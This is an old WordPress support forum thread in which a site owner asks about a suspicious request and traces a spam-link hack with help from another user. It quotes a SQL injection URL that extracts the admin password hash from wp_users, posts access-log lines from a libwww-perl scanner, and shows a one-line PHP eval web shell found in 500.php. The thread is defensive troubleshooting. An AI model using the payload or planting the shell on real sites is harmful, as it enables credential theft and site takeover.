uhh ohh!

Mobster
(@mobster)

17 years, 5 months ago

It’s me again with a little question:

What the (hack) heck is this?

index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*

Viewing 7 replies - 1 through 7 (of 7 total)

whooami
(@whooami)

17 years, 5 months ago

thats an exploit attempt. they want your password.

http://en.wikipedia.org/wiki/SQL_injection

Thread Starter Mobster
(@mobster)

17 years, 5 months ago

Are people physically doing this or is this a bot? If that’s possible? It happened twice within 2 minutes. Two different attempts.

Thanks Whooami!

Whooami, ready to make a couple bucks? I have tried and tried to rid a site of this hack and I have NO idea were it is or how they are doing it. I really would like you to take a look? What would you charge?

Thanks!

whooami
(@whooami)

17 years, 5 months ago

Are people physically doing this or is this a bot?

its probably a script kiddy. check your logs, look for libwww-perl or something similar, as the UA. thats actually a really dated exploit.

I have tried and tried ..

And are you still? hacked, that is?

send me a note via the contact form on my site, or just email me at whoo@ my my domain. Consultations are free today 😛

dont make the mistake though, just because you see those sorts of hits, of thinking that youre (still) hacked.

PS: I am at work today, and might be a little slow responding. dont sweat it, as soon as I can get the time, I will.
Thread Starter Mobster
(@mobster)

17 years, 5 months ago
Whoh! look at this!

Yes, I’m still hacked, the hundreds of spam links flooded my footer again the other day! This is really pissing me off!
```
98.28.75.45 - - [25/Nov/2008:20:40:51 -0700] "GET /favicon.ico HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
195.210.89.21 - - [25/Nov/2008:20:41:12 -0700] "HEAD /wp-content/themes/Million/images/uploads/2008/08/yamaha-damage-300x252.jpg HTTP/1.1" 200 355 "http://www.---------.com/" "libwww-perl/5.805"
195.210.89.24 - - [25/Nov/2008:20:41:13 -0700] "HEAD /wp-content/themes/Million/images/uploads/2008/08/yamaha-damage.jpg HTTP/1.1" 200 355 "http://www.------------.com/" "libwww-perl/5.805"
195.210.89.21 - - [25/Nov/2008:20:41:13 -0700] "HEAD /wp-content/themes/Million/images/uploads/2008/08/tabu-sf.jpg HTTP/1.1" 200 357 "http://www.--------.com/" "libwww-perl/5.805"
195.210.89.24 - - [25/Nov/2008:20:41:20 -0700] "HEAD /wp-content/themes/Million/images/uploads/2008/08/tabu-sf-300x225.jpg HTTP/1.1" 200 355 "http://www.-------.com/" "libwww-perl/5.805"
```
whooami
(@whooami)

17 years, 5 months ago

look at this!

yap.

send me an email. give me your url (i had it but forgot it), and your ftp info.

Do this yourself:

go to wp-admin/options.php

there are 2 entries that relate to upload paths. Do both of them look normal? One actually is probably blank (thats okay)…

Thread Starter Mobster
(@mobster)

17 years, 5 months ago

Yup, everything looks good there?

Thread Starter Mobster
(@mobster)

17 years, 5 months ago

I found this in 500.php

<?php @eval($_POST[a])?>

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘uhh ohh!’ is closed to new replies.

uhh ohh!

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics